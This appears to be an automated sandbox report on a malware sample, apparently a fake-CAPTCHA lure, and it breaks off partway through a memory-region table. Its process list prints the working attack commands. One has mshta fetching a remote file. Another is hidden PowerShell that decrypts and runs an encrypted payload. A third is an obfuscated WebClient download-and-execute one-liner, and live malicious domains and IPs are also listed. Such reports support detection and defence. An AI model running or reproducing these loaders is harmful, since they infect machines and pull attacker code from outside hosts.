Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\winwidgetshp[1].json
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfgw41fq.42d.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pziobvie.pow.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2wdiptt.5ji.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1plfcxf.wka.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
"C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split
($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F666BDFA8158678EDB2A26053A13025B2AE8B26218E13D71017DA8A8FE9CCBCC76E3BA3B6A95D1ED2A4A44A168E8636A1C900DADF3286F3ED2FDAD098EE58C7B6AFCCBC68203649484FF462A21AD9EE06F0B2A24495E62A40046DF6C39B77D47A014F0F0940CF765920FB7FA754DFE80F9D4138A2328D4A2F3909905D737350CA18D46A3F34F72969F4026F528EE194317064AC8ABF90F0C562A82D0FB23D49696F85E3A60A4C23E6FC2E69C0C21061968D1E083A7DC8FB925B87086B50A6B6A111CCAA936B945BCCF1B61BA45851312BC53A436D6FD6E88D4E39E965D4CBE982D9E2C56EB4D9900');$wBTv=-join
[char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((ERrXH('6B635876677359704D536E5770724B42')),[byte[]]::new(16)).TransformFinalBlock($ZMcko,0,$ZMcko.Length));
& $wBTv.Substring(0,3) $wBTv.Substring(129)
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV
plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR
Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR
Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable
z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR
Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd /C ""C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://solve.fizq.net/awjxs.captcha
|
172.67.131.114
|
||
https://locketplyxx.click/api
|
172.67.151.193
|
||
https://atsuka.thrivezest.org/hubus.xlm
|
172.67.183.27
|
||
https://atsuka.thri
|
unknown
|
||
https://solve.fizq.net/
|
unknown
|
||
https://atsuka.thrivezest.org
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.json$
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonLMEMh
|
unknown
|
||
https://solve.fizq.net/awjxs.captchai
|
unknown
|
||
https://solve.fizq.net/awjxs.captchad
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.json.
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonetCookiesx
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.jsonhttp
|
unknown
|
||
http://crl.microXz
|
unknown
|
||
https://atsukaa.thrivezest.org/
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsont
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonz
|
unknown
|
||
https://solve.fizq.net/awjxs.captchaDmG
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.json
|
104.21.18.182
|
||
https://atsukaMicrosoft.PowerShell.Utility.psd1
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonf
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonhttps://atsukaa.thrivezest.org/winwidgetshp.json
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://solve.fizq.net/awjxs.captcha&
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://solve.fizq.net/awjxs.captcha0
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://atsukaa.thrivezest.org/A
|
unknown
|
||
https://solve.fizq.net/awjxs.captcha1
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonstoryHistory.IE5x
|
unknown
|
||
https://solve.fizq.net/awjxs.captcha...
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.json...
|
unknown
|
||
https://atsukaa.thrivezest.org/=
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://solve.fizq.net/awjxs.captchaWinSta0
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsoneval(GbaEXk.replace(/(..)./g
|
unknown
|
||
https://atsukaa.thrivezest.org/5
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.jsonnC:
|
unknown
|
||
https://solve.fizq.net/awjxs.captchaP
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.json...#
|
unknown
|
||
https://atsukaa.thrivezest.org/winwidgetshp.json..z
|
unknown
|
There are 45 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
atsuka.thrivezest.org
|
172.67.183.27
|
||
locketplyxx.click
|
172.67.151.193
|
||
solve.fizq.net
|
172.67.131.114
|
||
atsukaa.thrivezest.org
|
104.21.18.182
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.67.131.114
|
solve.fizq.net
|
United States
|
||
172.67.183.27
|
atsuka.thrivezest.org
|
United States
|
||
172.67.151.193
|
locketplyxx.click
|
United States
|
||
104.21.18.182
|
atsukaa.thrivezest.org
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
D3E1000
|
trusted library allocation
|
page read and write
|
||
7890000
|
trusted library section
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4F3B000
|
stack
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F0F000
|
stack
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A78D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
73BE000
|
stack
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
4DEE000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
B04F000
|
trusted library allocation
|
page read and write
|
||
4EB6000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7BD0000
|
heap
|
page execute and read and write
|
||
5F48000
|
heap
|
page read and write
|
||
A3D0000
|
heap
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4A0C000
|
stack
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
45F7000
|
heap
|
page read and write
|
||
A2AA000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
33D6000
|
heap
|
page read and write
|
||
2798000
|
heap
|
page read and write
|
||
AEA0000
|
trusted library allocation
|
page read and write
|
||
A336000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
45C4000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
8F39000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5F69000
|
heap
|
page read and write
|
||
75F7000
|
heap
|
page read and write
|
||
9484000
|
trusted library allocation
|
page read and write
|
||
4C35000
|
trusted library allocation
|
page execute and read and write
|
||
9FE1000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5E0E000
|
stack
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
A34F000
|
heap
|
page read and write
|
||
A290000
|
heap
|
page read and write
|
||
282C000
|
heap
|
page read and write
|
||
6064000
|
heap
|
page read and write
|
||
7400000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
2740000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
A47F000
|
heap
|
page read and write
|
||
78AD000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
D6E000
|
stack
|
page read and write
|
||
8F31000
|
trusted library allocation
|
page read and write
|
||
A2CB000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
34C0000
|
trusted library allocation
|
page read and write
|
||
60AD000
|
heap
|
page read and write
|
||
AEE0000
|
trusted library allocation
|
page read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
7AC0000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
A34B000
|
heap
|
page read and write
|
||
5F8A000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
B5D4000
|
heap
|
page read and write
|
||
E3F000
|
heap
|
page read and write
|
||
A8E5000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
47CE000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A31B000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
8960000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
286D000
|
heap
|
page read and write
|
||
AD32000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
AEF3000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A333000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
6093000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
4C00000
|
trusted library allocation
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
AEEF000
|
trusted library allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
A5E1000
|
trusted library allocation
|
page read and write
|
||
A483000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
7641000
|
heap
|
page read and write
|
||
ADF0000
|
trusted library allocation
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
6076000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
8490000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
AD32000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
6066000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
4E00000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
6088000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F20000
|
heap
|
page read and write
|
||
AE94000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
A84F000
|
heap
|
page read and write
|
||
60F6000
|
heap
|
page read and write
|
||
604B000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
5F33000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
AEA0000
|
trusted library allocation
|
page read and write
|
||
A32B000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
A470000
|
heap
|
page read and write
|
||
47E6000
|
trusted library allocation
|
page read and write
|
||
5F54000
|
heap
|
page read and write
|
||
75C7000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
6ECE000
|
stack
|
page read and write
|
||
2880000
|
heap
|
page read and write
|
||
4838000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
9524000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
A312000
|
heap
|
page read and write
|
||
3089000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
6399000
|
trusted library allocation
|
page read and write
|
||
6074000
|
heap
|
page read and write
|
||
4F6A000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
6094000
|
heap
|
page read and write
|
||
5F8B000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
60F1000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
7730000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
4838000
|
trusted library allocation
|
page read and write
|
||
6E4E000
|
stack
|
page read and write
|
||
339D000
|
stack
|
page read and write
|
||
73FE000
|
stack
|
page read and write
|
||
47A2000
|
trusted library allocation
|
page read and write
|
||
84A0000
|
trusted library allocation
|
page execute and read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
4838000
|
trusted library allocation
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5DD0000
|
remote allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5560000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
3487000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F10000
|
heap
|
page read and write
|
||
602F000
|
heap
|
page read and write
|
||
B5D4000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4D86000
|
trusted library allocation
|
page execute and read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
A783000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
8860000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F66000
|
heap
|
page read and write
|
||
608D000
|
heap
|
page read and write
|
||
4C60000
|
heap
|
page readonly
|
||
5F83000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
8F99000
|
trusted library allocation
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
A792000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
774C000
|
stack
|
page read and write
|
||
60A6000
|
heap
|
page read and write
|
||
45D1000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
84B0000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
6066000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
E41000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
607E000
|
heap
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
B0A6000
|
trusted library allocation
|
page read and write
|
||
34CD000
|
trusted library allocation
|
page execute and read and write
|
||
5F75000
|
heap
|
page read and write
|
||
88CD000
|
stack
|
page read and write
|
||
5E11000
|
trusted library allocation
|
page read and write
|
||
286D000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
45E7000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
ACD8000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
2792000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
604B000
|
heap
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
4818000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
7950000
|
trusted library allocation
|
page read and write
|
||
AD3C000
|
trusted library allocation
|
page read and write
|
||
A713000
|
heap
|
page read and write
|
||
6F68000
|
trusted library allocation
|
page read and write
|
||
9473000
|
trusted library allocation
|
page read and write
|
||
7565000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A8E5000
|
heap
|
page read and write
|
||
AEE9000
|
trusted library allocation
|
page read and write
|
||
5F7A000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
A2D9000
|
heap
|
page read and write
|
||
7510000
|
trusted library allocation
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
AEF1000
|
trusted library allocation
|
page read and write
|
||
873C000
|
stack
|
page read and write
|
||
5F84000
|
heap
|
page read and write
|
||
5F59000
|
heap
|
page read and write
|
||
47E6000
|
trusted library allocation
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A291000
|
heap
|
page read and write
|
||
3107000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
509E000
|
stack
|
page read and write
|
||
5F7D000
|
heap
|
page read and write
|
||
7505000
|
heap
|
page execute and read and write
|
||
A7D4000
|
heap
|
page read and write
|
||
4730000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
A35B000
|
heap
|
page read and write
|
||
75CD000
|
heap
|
page read and write
|
||
AEE1000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4C10000
|
trusted library allocation
|
page read and write
|
||
5DD0000
|
remote allocation
|
page read and write
|
||
7520000
|
heap
|
page execute and read and write
|
||
288D000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4D6C000
|
stack
|
page read and write
|
||
5F83000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
33D0000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
60DF000
|
heap
|
page read and write
|
||
2790000
|
heap
|
page read and write
|
||
AEA0000
|
trusted library allocation
|
page read and write
|
||
5F75000
|
heap
|
page read and write
|
||
A6C0000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
52BE000
|
stack
|
page read and write
|
||
9471000
